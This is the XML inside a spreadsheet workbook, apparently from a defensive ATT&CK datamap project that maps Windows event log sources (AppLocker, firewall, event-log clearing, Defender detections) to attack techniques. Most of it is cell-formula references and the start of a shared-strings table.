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3"/>
  <workbookPr codeName="ThisWorkbook" defaultThemeVersion="166925"/>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice Requires="x15">
      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/olafhartong/Desktop/ATTACKdatamap/Sample results/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{FF258000-406C-9840-8B73-D6BA9E424A01}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="720" yWindow="460" windowWidth="37680" windowHeight="23540" activeTab="1" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="DataSourceEvents" sheetId="1" r:id="rId1"/>
    <sheet name="TechniqueDataSourceWeights" sheetId="2" r:id="rId2"/>
    <sheet name="RatingLegend" sheetId="3" r:id="rId3"/>
    <sheet name="KnowledgeBase" sheetId="4" r:id="rId4"/>
    <sheet name="REF-DataSources" sheetId="5" r:id="rId5"/>
  </sheets>
  <externalReferences>
    <externalReference r:id="rId6"/>
  </externalReferences>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">KnowledgeBase!$A$1:$E$1</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">TechniqueDataSourceWeights!$A$2:$G$224</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67" i="2" l="1"/>
  <c r="B267" i="2"/>
  <c r="D267" i="2" s="1"/>
  <c r="E266" i="2"/>
  <c r="B266" i="2"/>
  <c r="D266" i="2" s="1"/>
  <c r="E265" i="2"/>
  <c r="D265" i="2"/>
  <c r="B265" i="2"/>
  <c r="E264" i="2"/>
  <c r="B264" i="2"/>
  <c r="D264" i="2" s="1"/>
  <c r="E263" i="2"/>
  <c r="B263" i="2"/>
  <c r="D263" i="2" s="1"/>
  <c r="E262" i="2"/>
  <c r="D262" i="2"/>
  <c r="B262" i="2"/>
  <c r="E261" i="2"/>
  <c r="B261" i="2"/>
  <c r="D261" i="2" s="1"/>
  <c r="E260" i="2"/>
  <c r="B260" i="2"/>
  <c r="D260" i="2" s="1"/>
  <c r="E259" i="2"/>
  <c r="B259" i="2"/>
  <c r="D259" i="2" s="1"/>
  <c r="E258" i="2"/>
  <c r="B258" i="2"/>
  <c r="D258" i="2" s="1"/>
  <c r="E257" i="2"/>
  <c r="D257" i="2"/>
  <c r="B257" i="2"/>
  <c r="E256" i="2"/>
  <c r="B256" i="2"/>
  <c r="D256" i="2" s="1"/>
  <c r="E255" i="2"/>
  <c r="B255" i="2"/>
  <c r="D255" i="2" s="1"/>
  <c r="E254" i="2"/>
  <c r="D254" i="2"/>
  <c r="B254" i="2"/>
  <c r="E253" i="2"/>
  <c r="B253" i="2"/>
  <c r="D253" i="2" s="1"/>
  <c r="E252" i="2"/>
  <c r="B252" i="2"/>
  <c r="D252" i="2" s="1"/>
  <c r="E251" i="2"/>
  <c r="B251" i="2"/>
  <c r="D251" i="2" s="1"/>
  <c r="E250" i="2"/>
  <c r="B250" i="2"/>
  <c r="D250" i="2" s="1"/>
  <c r="E249" i="2"/>
  <c r="D249" i="2"/>
  <c r="B249" i="2"/>
  <c r="E248" i="2"/>
  <c r="B248" i="2"/>
  <c r="D248" i="2" s="1"/>
  <c r="E247" i="2"/>
  <c r="B247" i="2"/>
  <c r="D247" i="2" s="1"/>
  <c r="E246" i="2"/>
  <c r="D246" i="2"/>
  <c r="B246" i="2"/>
  <c r="E245" i="2"/>
  <c r="B245" i="2"/>
  <c r="D245" i="2" s="1"/>
  <c r="E244" i="2"/>
  <c r="B244" i="2"/>
  <c r="D244" i="2" s="1"/>
  <c r="E243" i="2"/>
  <c r="B243" i="2"/>
  <c r="D243" i="2" s="1"/>
  <c r="E242" i="2"/>
  <c r="B242" i="2"/>
  <c r="D242" i="2" s="1"/>
  <c r="E241" i="2"/>
  <c r="D241" i="2"/>
  <c r="B241" i="2"/>
  <c r="E240" i="2"/>
  <c r="B240" i="2"/>
  <c r="D240" i="2" s="1"/>
  <c r="E239" i="2"/>
  <c r="B239" i="2"/>
  <c r="D239" i="2" s="1"/>
  <c r="E238" i="2"/>
  <c r="D238" i="2"/>
  <c r="B238" i="2"/>
  <c r="E237" i="2"/>
  <c r="B237" i="2"/>
  <c r="D237" i="2" s="1"/>
  <c r="E236" i="2"/>
  <c r="B236" i="2"/>
  <c r="D236" i="2" s="1"/>
  <c r="E235" i="2"/>
  <c r="B235" i="2"/>
  <c r="D235" i="2" s="1"/>
  <c r="E234" i="2"/>
  <c r="B234" i="2"/>
  <c r="D234" i="2" s="1"/>
  <c r="E233" i="2"/>
  <c r="D233" i="2"/>
  <c r="B233" i="2"/>
  <c r="E232" i="2"/>
  <c r="B232" i="2"/>
  <c r="D232" i="2" s="1"/>
  <c r="E231" i="2"/>
  <c r="B231" i="2"/>
  <c r="D231" i="2" s="1"/>
  <c r="E230" i="2"/>
  <c r="D230" i="2"/>
  <c r="B230" i="2"/>
  <c r="E229" i="2"/>
  <c r="B229" i="2"/>
  <c r="D229" i="2" s="1"/>
  <c r="E228" i="2"/>
  <c r="B228" i="2"/>
  <c r="D228" i="2" s="1"/>
  <c r="E227" i="2"/>
  <c r="B227" i="2"/>
  <c r="D227" i="2" s="1"/>
  <c r="E226" i="2"/>
  <c r="B226" i="2"/>
  <c r="D226" i="2" s="1"/>
  <c r="E225" i="2"/>
  <c r="D225" i="2"/>
  <c r="B225" i="2"/>
  <c r="H19" i="2" l="1"/>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3" i="2"/>
  <c r="H4" i="2"/>
  <c r="H5" i="2"/>
  <c r="H6" i="2"/>
  <c r="H7" i="2"/>
  <c r="H8" i="2"/>
  <c r="H9" i="2"/>
  <c r="H10" i="2"/>
  <c r="H11" i="2"/>
  <c r="H12" i="2"/>
  <c r="H13" i="2"/>
  <c r="H14" i="2"/>
  <c r="H15" i="2"/>
  <c r="H16" i="2"/>
  <c r="H17" i="2"/>
  <c r="H18" i="2"/>
  <c r="H2" i="2"/>
  <c r="E224" i="2" l="1"/>
  <c r="B224" i="2"/>
  <c r="D224" i="2" s="1"/>
  <c r="E223" i="2"/>
  <c r="B223" i="2"/>
  <c r="D223" i="2" s="1"/>
  <c r="E222" i="2"/>
  <c r="B222" i="2"/>
  <c r="D222" i="2" s="1"/>
  <c r="E221" i="2"/>
  <c r="B221" i="2"/>
  <c r="D221" i="2" s="1"/>
  <c r="E220" i="2"/>
  <c r="B220" i="2"/>
  <c r="D220" i="2" s="1"/>
  <c r="E219" i="2"/>
  <c r="B219" i="2"/>
  <c r="D219" i="2" s="1"/>
  <c r="E218" i="2"/>
  <c r="B218" i="2"/>
  <c r="D218" i="2" s="1"/>
  <c r="E217" i="2"/>
  <c r="B217" i="2"/>
  <c r="D217" i="2" s="1"/>
  <c r="E216" i="2"/>
  <c r="B216" i="2"/>
  <c r="D216" i="2" s="1"/>
  <c r="E215" i="2"/>
  <c r="B215" i="2"/>
  <c r="D215" i="2" s="1"/>
  <c r="E214" i="2"/>
  <c r="D214" i="2"/>
  <c r="B214" i="2"/>
  <c r="E213" i="2"/>
  <c r="B213" i="2"/>
  <c r="D213" i="2" s="1"/>
  <c r="E212" i="2"/>
  <c r="B212" i="2"/>
  <c r="D212" i="2" s="1"/>
  <c r="E211" i="2"/>
  <c r="B211" i="2"/>
  <c r="D211" i="2" s="1"/>
  <c r="E210" i="2"/>
  <c r="B210" i="2"/>
  <c r="D210" i="2" s="1"/>
  <c r="E209" i="2"/>
  <c r="B209" i="2"/>
  <c r="D209" i="2" s="1"/>
  <c r="E208" i="2"/>
  <c r="B208" i="2"/>
  <c r="D208" i="2" s="1"/>
  <c r="E207" i="2"/>
  <c r="B207" i="2"/>
  <c r="D207" i="2" s="1"/>
  <c r="E206" i="2"/>
  <c r="D206" i="2"/>
  <c r="B206" i="2"/>
  <c r="E205" i="2"/>
  <c r="B205" i="2"/>
  <c r="D205" i="2" s="1"/>
  <c r="E204" i="2"/>
  <c r="B204" i="2"/>
  <c r="D204" i="2" s="1"/>
  <c r="E203" i="2"/>
  <c r="B203" i="2"/>
  <c r="D203" i="2" s="1"/>
  <c r="E202" i="2"/>
  <c r="B202" i="2"/>
  <c r="D202" i="2" s="1"/>
  <c r="E201" i="2"/>
  <c r="B201" i="2"/>
  <c r="D201" i="2" s="1"/>
  <c r="E200" i="2"/>
  <c r="B200" i="2"/>
  <c r="D200" i="2" s="1"/>
  <c r="E199" i="2"/>
  <c r="B199" i="2"/>
  <c r="D199" i="2" s="1"/>
  <c r="E198" i="2"/>
  <c r="D198" i="2"/>
  <c r="B198" i="2"/>
  <c r="E197" i="2"/>
  <c r="B197" i="2"/>
  <c r="D197" i="2" s="1"/>
  <c r="E196" i="2"/>
  <c r="B196" i="2"/>
  <c r="D196" i="2" s="1"/>
  <c r="E195" i="2"/>
  <c r="B195" i="2"/>
  <c r="D195" i="2" s="1"/>
  <c r="E194" i="2"/>
  <c r="B194" i="2"/>
  <c r="D194" i="2" s="1"/>
  <c r="E193" i="2"/>
  <c r="B193" i="2"/>
  <c r="D193" i="2" s="1"/>
  <c r="E192" i="2"/>
  <c r="B192" i="2"/>
  <c r="D192" i="2" s="1"/>
  <c r="E191" i="2"/>
  <c r="B191" i="2"/>
  <c r="D191" i="2" s="1"/>
  <c r="E190" i="2"/>
  <c r="B190" i="2"/>
  <c r="D190" i="2" s="1"/>
  <c r="E189" i="2"/>
  <c r="B189" i="2"/>
  <c r="D189" i="2" s="1"/>
  <c r="E188" i="2"/>
  <c r="B188" i="2"/>
  <c r="D188" i="2" s="1"/>
  <c r="E187" i="2"/>
  <c r="D187" i="2"/>
  <c r="B187" i="2"/>
  <c r="E186" i="2"/>
  <c r="B186" i="2"/>
  <c r="D186" i="2" s="1"/>
  <c r="E185" i="2"/>
  <c r="B185" i="2"/>
  <c r="D185" i="2" s="1"/>
  <c r="E184" i="2"/>
  <c r="B184" i="2"/>
  <c r="D184" i="2" s="1"/>
  <c r="E183" i="2"/>
  <c r="B183" i="2"/>
  <c r="D183" i="2" s="1"/>
  <c r="E182" i="2"/>
  <c r="D182" i="2"/>
  <c r="B182" i="2"/>
  <c r="E181" i="2"/>
  <c r="B181" i="2"/>
  <c r="D181" i="2" s="1"/>
  <c r="E180" i="2"/>
  <c r="B180" i="2"/>
  <c r="D180" i="2" s="1"/>
  <c r="E179" i="2"/>
  <c r="B179" i="2"/>
  <c r="D179" i="2" s="1"/>
  <c r="E178" i="2"/>
  <c r="B178" i="2"/>
  <c r="D178" i="2" s="1"/>
  <c r="E177" i="2"/>
  <c r="B177" i="2"/>
  <c r="D177" i="2" s="1"/>
  <c r="E176" i="2"/>
  <c r="B176" i="2"/>
  <c r="D176" i="2" s="1"/>
  <c r="E175" i="2"/>
  <c r="B175" i="2"/>
  <c r="D175" i="2" s="1"/>
  <c r="E174" i="2"/>
  <c r="B174" i="2"/>
  <c r="D174" i="2" s="1"/>
  <c r="E173" i="2"/>
  <c r="B173" i="2"/>
  <c r="D173" i="2" s="1"/>
  <c r="E172" i="2"/>
  <c r="B172" i="2"/>
  <c r="D172" i="2" s="1"/>
  <c r="E171" i="2"/>
  <c r="D171" i="2"/>
  <c r="B171" i="2"/>
  <c r="E170" i="2"/>
  <c r="B170" i="2"/>
  <c r="D170" i="2" s="1"/>
  <c r="E169" i="2"/>
  <c r="B169" i="2"/>
  <c r="D169" i="2" s="1"/>
  <c r="E168" i="2"/>
  <c r="B168" i="2"/>
  <c r="D168" i="2" s="1"/>
  <c r="E167" i="2"/>
  <c r="B167" i="2"/>
  <c r="D167" i="2" s="1"/>
  <c r="E166" i="2"/>
  <c r="D166" i="2"/>
  <c r="B166" i="2"/>
  <c r="E165" i="2"/>
  <c r="B165" i="2"/>
  <c r="D165" i="2" s="1"/>
  <c r="E164" i="2"/>
  <c r="B164" i="2"/>
  <c r="D164" i="2" s="1"/>
  <c r="E163" i="2"/>
  <c r="B163" i="2"/>
  <c r="D163" i="2" s="1"/>
  <c r="E162" i="2"/>
  <c r="B162" i="2"/>
  <c r="D162" i="2" s="1"/>
  <c r="E161" i="2"/>
  <c r="B161" i="2"/>
  <c r="D161" i="2" s="1"/>
  <c r="E160" i="2"/>
  <c r="B160" i="2"/>
  <c r="D160" i="2" s="1"/>
  <c r="E159" i="2"/>
  <c r="B159" i="2"/>
  <c r="D159" i="2" s="1"/>
  <c r="E158" i="2"/>
  <c r="B158" i="2"/>
  <c r="D158" i="2" s="1"/>
  <c r="E157" i="2"/>
  <c r="B157" i="2"/>
  <c r="D157" i="2" s="1"/>
  <c r="E156" i="2"/>
  <c r="B156" i="2"/>
  <c r="D156" i="2" s="1"/>
  <c r="E155" i="2"/>
  <c r="D155" i="2"/>
  <c r="B155" i="2"/>
  <c r="E154" i="2"/>
  <c r="B154" i="2"/>
  <c r="D154" i="2" s="1"/>
  <c r="E153" i="2"/>
  <c r="B153" i="2"/>
  <c r="D153" i="2" s="1"/>
  <c r="E152" i="2"/>
  <c r="B152" i="2"/>
  <c r="D152" i="2" s="1"/>
  <c r="E151" i="2"/>
  <c r="B151" i="2"/>
  <c r="D151" i="2" s="1"/>
  <c r="E150" i="2"/>
  <c r="D150" i="2"/>
  <c r="B150" i="2"/>
  <c r="E149" i="2"/>
  <c r="B149" i="2"/>
  <c r="D149" i="2" s="1"/>
  <c r="E148" i="2"/>
  <c r="B148" i="2"/>
  <c r="D148" i="2" s="1"/>
  <c r="E147" i="2"/>
  <c r="B147" i="2"/>
  <c r="D147" i="2" s="1"/>
  <c r="E146" i="2"/>
  <c r="B146" i="2"/>
  <c r="D146" i="2" s="1"/>
  <c r="E145" i="2"/>
  <c r="B145" i="2"/>
  <c r="D145" i="2" s="1"/>
  <c r="E144" i="2"/>
  <c r="B144" i="2"/>
  <c r="D144" i="2" s="1"/>
  <c r="E143" i="2"/>
  <c r="B143" i="2"/>
  <c r="D143" i="2" s="1"/>
  <c r="E142" i="2"/>
  <c r="B142" i="2"/>
  <c r="D142" i="2" s="1"/>
  <c r="E141" i="2"/>
  <c r="B141" i="2"/>
  <c r="D141" i="2" s="1"/>
  <c r="E140" i="2"/>
  <c r="B140" i="2"/>
  <c r="D140" i="2" s="1"/>
  <c r="E139" i="2"/>
  <c r="D139" i="2"/>
  <c r="B139" i="2"/>
  <c r="E138" i="2"/>
  <c r="B138" i="2"/>
  <c r="D138" i="2" s="1"/>
  <c r="E137" i="2"/>
  <c r="B137" i="2"/>
  <c r="D137" i="2" s="1"/>
  <c r="E136" i="2"/>
  <c r="B136" i="2"/>
  <c r="D136" i="2" s="1"/>
  <c r="E135" i="2"/>
  <c r="B135" i="2"/>
  <c r="D135" i="2" s="1"/>
  <c r="E134" i="2"/>
  <c r="D134" i="2"/>
  <c r="B134" i="2"/>
  <c r="E133" i="2"/>
  <c r="B133" i="2"/>
  <c r="D133" i="2" s="1"/>
  <c r="E132" i="2"/>
  <c r="B132" i="2"/>
  <c r="D132" i="2" s="1"/>
  <c r="E131" i="2"/>
  <c r="B131" i="2"/>
  <c r="D131" i="2" s="1"/>
  <c r="E130" i="2"/>
  <c r="B130" i="2"/>
  <c r="D130" i="2" s="1"/>
  <c r="E129" i="2"/>
  <c r="B129" i="2"/>
  <c r="D129" i="2" s="1"/>
  <c r="E128" i="2"/>
  <c r="B128" i="2"/>
  <c r="D128" i="2" s="1"/>
  <c r="E127" i="2"/>
  <c r="B127" i="2"/>
  <c r="D127" i="2" s="1"/>
  <c r="E126" i="2"/>
  <c r="B126" i="2"/>
  <c r="D126" i="2" s="1"/>
  <c r="E125" i="2"/>
  <c r="B125" i="2"/>
  <c r="D125" i="2" s="1"/>
  <c r="E124" i="2"/>
  <c r="B124" i="2"/>
  <c r="D124" i="2" s="1"/>
  <c r="E123" i="2"/>
  <c r="D123" i="2"/>
  <c r="B123" i="2"/>
  <c r="E122" i="2"/>
  <c r="B122" i="2"/>
  <c r="D122" i="2" s="1"/>
  <c r="E121" i="2"/>
  <c r="B121" i="2"/>
  <c r="D121" i="2" s="1"/>
  <c r="E120" i="2"/>
  <c r="B120" i="2"/>
  <c r="D120" i="2" s="1"/>
  <c r="E119" i="2"/>
  <c r="B119" i="2"/>
  <c r="D119" i="2" s="1"/>
  <c r="E118" i="2"/>
  <c r="D118" i="2"/>
  <c r="B118" i="2"/>
  <c r="E117" i="2"/>
  <c r="B117" i="2"/>
  <c r="D117" i="2" s="1"/>
  <c r="E116" i="2"/>
  <c r="B116" i="2"/>
  <c r="D116" i="2" s="1"/>
  <c r="E115" i="2"/>
  <c r="B115" i="2"/>
  <c r="D115" i="2" s="1"/>
  <c r="E114" i="2"/>
  <c r="B114" i="2"/>
  <c r="D114" i="2" s="1"/>
  <c r="E113" i="2"/>
  <c r="B113" i="2"/>
  <c r="D113" i="2" s="1"/>
  <c r="E112" i="2"/>
  <c r="B112" i="2"/>
  <c r="D112" i="2" s="1"/>
  <c r="E111" i="2"/>
  <c r="B111" i="2"/>
  <c r="D111" i="2" s="1"/>
  <c r="E110" i="2"/>
  <c r="B110" i="2"/>
  <c r="D110" i="2" s="1"/>
  <c r="E109" i="2"/>
  <c r="B109" i="2"/>
  <c r="D109" i="2" s="1"/>
  <c r="E108" i="2"/>
  <c r="B108" i="2"/>
  <c r="D108" i="2" s="1"/>
  <c r="E107" i="2"/>
  <c r="D107" i="2"/>
  <c r="B107" i="2"/>
  <c r="E106" i="2"/>
  <c r="B106" i="2"/>
  <c r="D106" i="2" s="1"/>
  <c r="E105" i="2"/>
  <c r="B105" i="2"/>
  <c r="D105" i="2" s="1"/>
  <c r="E104" i="2"/>
  <c r="B104" i="2"/>
  <c r="D104" i="2" s="1"/>
  <c r="E103" i="2"/>
  <c r="B103" i="2"/>
  <c r="D103" i="2" s="1"/>
  <c r="E102" i="2"/>
  <c r="B102" i="2"/>
  <c r="D102" i="2" s="1"/>
  <c r="E101" i="2"/>
  <c r="B101" i="2"/>
  <c r="D101" i="2" s="1"/>
  <c r="E100" i="2"/>
  <c r="B100" i="2"/>
  <c r="D100" i="2" s="1"/>
  <c r="E99" i="2"/>
  <c r="B99" i="2"/>
  <c r="D99" i="2" s="1"/>
  <c r="E98" i="2"/>
  <c r="B98" i="2"/>
  <c r="D98" i="2" s="1"/>
  <c r="E97" i="2"/>
  <c r="B97" i="2"/>
  <c r="D97" i="2" s="1"/>
  <c r="E96" i="2"/>
  <c r="B96" i="2"/>
  <c r="D96" i="2" s="1"/>
  <c r="E95" i="2"/>
  <c r="B95" i="2"/>
  <c r="D95" i="2" s="1"/>
  <c r="E94" i="2"/>
  <c r="B94" i="2"/>
  <c r="D94" i="2" s="1"/>
  <c r="E93" i="2"/>
  <c r="B93" i="2"/>
  <c r="D93" i="2" s="1"/>
  <c r="E92" i="2"/>
  <c r="B92" i="2"/>
  <c r="D92" i="2" s="1"/>
  <c r="E91" i="2"/>
  <c r="D91" i="2"/>
  <c r="B91" i="2"/>
  <c r="E90" i="2"/>
  <c r="B90" i="2"/>
  <c r="D90" i="2" s="1"/>
  <c r="E89" i="2"/>
  <c r="D89" i="2"/>
  <c r="B89" i="2"/>
  <c r="E88" i="2"/>
  <c r="B88" i="2"/>
  <c r="D88" i="2" s="1"/>
  <c r="E87" i="2"/>
  <c r="B87" i="2"/>
  <c r="D87" i="2" s="1"/>
  <c r="E86" i="2"/>
  <c r="D86" i="2"/>
  <c r="B86" i="2"/>
  <c r="E85" i="2"/>
  <c r="B85" i="2"/>
  <c r="D85" i="2" s="1"/>
  <c r="E84" i="2"/>
  <c r="B84" i="2"/>
  <c r="D84" i="2" s="1"/>
  <c r="E83" i="2"/>
  <c r="B83" i="2"/>
  <c r="D83" i="2" s="1"/>
  <c r="E82" i="2"/>
  <c r="B82" i="2"/>
  <c r="D82" i="2" s="1"/>
  <c r="E81" i="2"/>
  <c r="B81" i="2"/>
  <c r="D81" i="2" s="1"/>
  <c r="E80" i="2"/>
  <c r="B80" i="2"/>
  <c r="D80" i="2" s="1"/>
  <c r="E79" i="2"/>
  <c r="D79" i="2"/>
  <c r="B79" i="2"/>
  <c r="E78" i="2"/>
  <c r="B78" i="2"/>
  <c r="D78" i="2" s="1"/>
  <c r="E77" i="2"/>
  <c r="B77" i="2"/>
  <c r="D77" i="2" s="1"/>
  <c r="E76" i="2"/>
  <c r="B76" i="2"/>
  <c r="D76" i="2" s="1"/>
  <c r="E75" i="2"/>
  <c r="B75" i="2"/>
  <c r="D75" i="2" s="1"/>
  <c r="E74" i="2"/>
  <c r="D74" i="2"/>
  <c r="B74" i="2"/>
  <c r="E73" i="2"/>
  <c r="B73" i="2"/>
  <c r="D73" i="2" s="1"/>
  <c r="E72" i="2"/>
  <c r="B72" i="2"/>
  <c r="D72" i="2" s="1"/>
  <c r="E71" i="2"/>
  <c r="D71" i="2"/>
  <c r="B71" i="2"/>
  <c r="E70" i="2"/>
  <c r="B70" i="2"/>
  <c r="D70" i="2" s="1"/>
  <c r="E69" i="2"/>
  <c r="D69" i="2"/>
  <c r="B69" i="2"/>
  <c r="E68" i="2"/>
  <c r="B68" i="2"/>
  <c r="D68" i="2" s="1"/>
  <c r="E67" i="2"/>
  <c r="B67" i="2"/>
  <c r="D67" i="2" s="1"/>
  <c r="E66" i="2"/>
  <c r="D66" i="2"/>
  <c r="B66" i="2"/>
  <c r="E65" i="2"/>
  <c r="B65" i="2"/>
  <c r="D65" i="2" s="1"/>
  <c r="E64" i="2"/>
  <c r="B64" i="2"/>
  <c r="D64" i="2" s="1"/>
  <c r="E63" i="2"/>
  <c r="B63" i="2"/>
  <c r="D63" i="2" s="1"/>
  <c r="E62" i="2"/>
  <c r="B62" i="2"/>
  <c r="D62" i="2" s="1"/>
  <c r="E61" i="2"/>
  <c r="B61" i="2"/>
  <c r="D61" i="2" s="1"/>
  <c r="E60" i="2"/>
  <c r="B60" i="2"/>
  <c r="D60" i="2" s="1"/>
  <c r="E59" i="2"/>
  <c r="B59" i="2"/>
  <c r="D59" i="2" s="1"/>
  <c r="E58" i="2"/>
  <c r="B58" i="2"/>
  <c r="D58" i="2" s="1"/>
  <c r="E57" i="2"/>
  <c r="B57" i="2"/>
  <c r="D57" i="2" s="1"/>
  <c r="E56" i="2"/>
  <c r="B56" i="2"/>
  <c r="D56" i="2" s="1"/>
  <c r="E55" i="2"/>
  <c r="B55" i="2"/>
  <c r="D55" i="2" s="1"/>
  <c r="E54" i="2"/>
  <c r="B54" i="2"/>
  <c r="D54" i="2" s="1"/>
  <c r="E53" i="2"/>
  <c r="D53" i="2"/>
  <c r="B53" i="2"/>
  <c r="E52" i="2"/>
  <c r="B52" i="2"/>
  <c r="D52" i="2" s="1"/>
  <c r="E51" i="2"/>
  <c r="B51" i="2"/>
  <c r="D51" i="2" s="1"/>
  <c r="E50" i="2"/>
  <c r="B50" i="2"/>
  <c r="D50" i="2" s="1"/>
  <c r="E49" i="2"/>
  <c r="B49" i="2"/>
  <c r="D49" i="2" s="1"/>
  <c r="E48" i="2"/>
  <c r="B48" i="2"/>
  <c r="D48" i="2" s="1"/>
  <c r="E47" i="2"/>
  <c r="B47" i="2"/>
  <c r="D47" i="2" s="1"/>
  <c r="E46" i="2"/>
  <c r="B46" i="2"/>
  <c r="D46" i="2" s="1"/>
  <c r="E45" i="2"/>
  <c r="B45" i="2"/>
  <c r="D45" i="2" s="1"/>
  <c r="E44" i="2"/>
  <c r="B44" i="2"/>
  <c r="D44" i="2" s="1"/>
  <c r="E43" i="2"/>
  <c r="D43" i="2"/>
  <c r="B43" i="2"/>
  <c r="E42" i="2"/>
  <c r="B42" i="2"/>
  <c r="D42" i="2" s="1"/>
  <c r="E41" i="2"/>
  <c r="B41" i="2"/>
  <c r="D41" i="2" s="1"/>
  <c r="E40" i="2"/>
  <c r="B40" i="2"/>
  <c r="D40" i="2" s="1"/>
  <c r="E39" i="2"/>
  <c r="B39" i="2"/>
  <c r="D39" i="2" s="1"/>
  <c r="E38" i="2"/>
  <c r="B38" i="2"/>
  <c r="D38" i="2" s="1"/>
  <c r="E37" i="2"/>
  <c r="B37" i="2"/>
  <c r="D37" i="2" s="1"/>
  <c r="E36" i="2"/>
  <c r="B36" i="2"/>
  <c r="D36" i="2" s="1"/>
  <c r="E35" i="2"/>
  <c r="B35" i="2"/>
  <c r="D35" i="2" s="1"/>
  <c r="E34" i="2"/>
  <c r="B34" i="2"/>
  <c r="D34" i="2" s="1"/>
  <c r="E33" i="2"/>
  <c r="B33" i="2"/>
  <c r="D33" i="2" s="1"/>
  <c r="E32" i="2"/>
  <c r="B32" i="2"/>
  <c r="D32" i="2" s="1"/>
  <c r="E31" i="2"/>
  <c r="B31" i="2"/>
  <c r="D31" i="2" s="1"/>
  <c r="E30" i="2"/>
  <c r="B30" i="2"/>
  <c r="D30" i="2" s="1"/>
  <c r="E29" i="2"/>
  <c r="B29" i="2"/>
  <c r="D29" i="2" s="1"/>
  <c r="E28" i="2"/>
  <c r="B28" i="2"/>
  <c r="D28" i="2" s="1"/>
  <c r="E27" i="2"/>
  <c r="B27" i="2"/>
  <c r="D27" i="2" s="1"/>
  <c r="E26" i="2"/>
  <c r="B26" i="2"/>
  <c r="D26" i="2" s="1"/>
  <c r="E25" i="2"/>
  <c r="B25" i="2"/>
  <c r="D25" i="2" s="1"/>
  <c r="E24" i="2"/>
  <c r="B24" i="2"/>
  <c r="D24" i="2" s="1"/>
  <c r="E23" i="2"/>
  <c r="B23" i="2"/>
  <c r="D23" i="2" s="1"/>
  <c r="E22" i="2"/>
  <c r="B22" i="2"/>
  <c r="D22" i="2" s="1"/>
  <c r="E21" i="2"/>
  <c r="B21" i="2"/>
  <c r="D21" i="2" s="1"/>
  <c r="E20" i="2"/>
  <c r="B20" i="2"/>
  <c r="D20" i="2" s="1"/>
  <c r="E19" i="2"/>
  <c r="B19" i="2"/>
  <c r="D19" i="2" s="1"/>
  <c r="E18" i="2"/>
  <c r="B18" i="2"/>
  <c r="D18" i="2" s="1"/>
  <c r="E17" i="2"/>
  <c r="B17" i="2"/>
  <c r="D17" i="2" s="1"/>
  <c r="E16" i="2"/>
  <c r="B16" i="2"/>
  <c r="D16" i="2" s="1"/>
  <c r="E15" i="2"/>
  <c r="D15" i="2"/>
  <c r="B15" i="2"/>
  <c r="E14" i="2"/>
  <c r="B14" i="2"/>
  <c r="D14" i="2" s="1"/>
  <c r="E13" i="2"/>
  <c r="B13" i="2"/>
  <c r="D13" i="2" s="1"/>
  <c r="E12" i="2"/>
  <c r="B12" i="2"/>
  <c r="D12" i="2" s="1"/>
  <c r="E11" i="2"/>
  <c r="B11" i="2"/>
  <c r="D11" i="2" s="1"/>
  <c r="E10" i="2"/>
  <c r="B10" i="2"/>
  <c r="D10" i="2" s="1"/>
  <c r="E9" i="2"/>
  <c r="B9" i="2"/>
  <c r="D9" i="2" s="1"/>
  <c r="E8" i="2"/>
  <c r="B8" i="2"/>
  <c r="D8" i="2" s="1"/>
  <c r="E7" i="2"/>
  <c r="B7" i="2"/>
  <c r="D7" i="2" s="1"/>
  <c r="E6" i="2"/>
  <c r="B6" i="2"/>
  <c r="D6" i="2" s="1"/>
  <c r="E5" i="2"/>
  <c r="B5" i="2"/>
  <c r="D5" i="2" s="1"/>
  <c r="E4" i="2"/>
  <c r="B4" i="2"/>
  <c r="D4" i="2" s="1"/>
  <c r="E3" i="2"/>
  <c r="B3" i="2"/>
  <c r="D3" i="2" s="1"/>
  <c r="G2" i="2"/>
  <c r="E2" i="2"/>
  <c r="D2" i="2"/>
  <c r="B2" i="2"/>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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="2878" uniqueCount="1612">
  <si>
    <t xml:space="preserve">Category </t>
  </si>
  <si>
    <t>Event</t>
  </si>
  <si>
    <t>Type</t>
  </si>
  <si>
    <t>ID</t>
  </si>
  <si>
    <t>Application whitelisting</t>
  </si>
  <si>
    <t>AppLocker Block</t>
  </si>
  <si>
    <t>AppLocker Warning</t>
  </si>
  <si>
    <t>SRP Block</t>
  </si>
  <si>
    <t>865, 866, 867, 868, 882</t>
  </si>
  <si>
    <t>Application crashes</t>
  </si>
  <si>
    <t>App Hang</t>
  </si>
  <si>
    <t>Appcrash</t>
  </si>
  <si>
    <t>EMET</t>
  </si>
  <si>
    <t>System or Service Failures</t>
  </si>
  <si>
    <t>Windows Service Fails or Crashes</t>
  </si>
  <si>
    <t>7022, 7023, 7024, 7026, 7031, 7032, 7034</t>
  </si>
  <si>
    <t>Windows firewall</t>
  </si>
  <si>
    <t>Firewall Rule Add</t>
  </si>
  <si>
    <t>Firewall Rule Change</t>
  </si>
  <si>
    <t>Firewall Rules Deleted</t>
  </si>
  <si>
    <t>2006, 2033</t>
  </si>
  <si>
    <t>Anti-forensics</t>
  </si>
  <si>
    <t>Event Log was Cleared</t>
  </si>
  <si>
    <t>Audit Log was Cleared</t>
  </si>
  <si>
    <t>Event log service stopped</t>
  </si>
  <si>
    <t>Windows:Security</t>
  </si>
  <si>
    <t>Software and Service Installation</t>
  </si>
  <si>
    <t>New Kernel Filter Driver</t>
  </si>
  <si>
    <t>Sysmon</t>
  </si>
  <si>
    <t>Kernel Driver Signing</t>
  </si>
  <si>
    <t>Detect an invalid image hash of a file</t>
  </si>
  <si>
    <t>Detected an invalid page hash of an image file</t>
  </si>
  <si>
    <t>Code integrity check</t>
  </si>
  <si>
    <t>3001, 3002, 3003, 3004, 3010, 3023</t>
  </si>
  <si>
    <t>Failed Kernel Driver Loading</t>
  </si>
  <si>
    <t>Windows Defender</t>
  </si>
  <si>
    <t>Detected Malware</t>
  </si>
  <si>
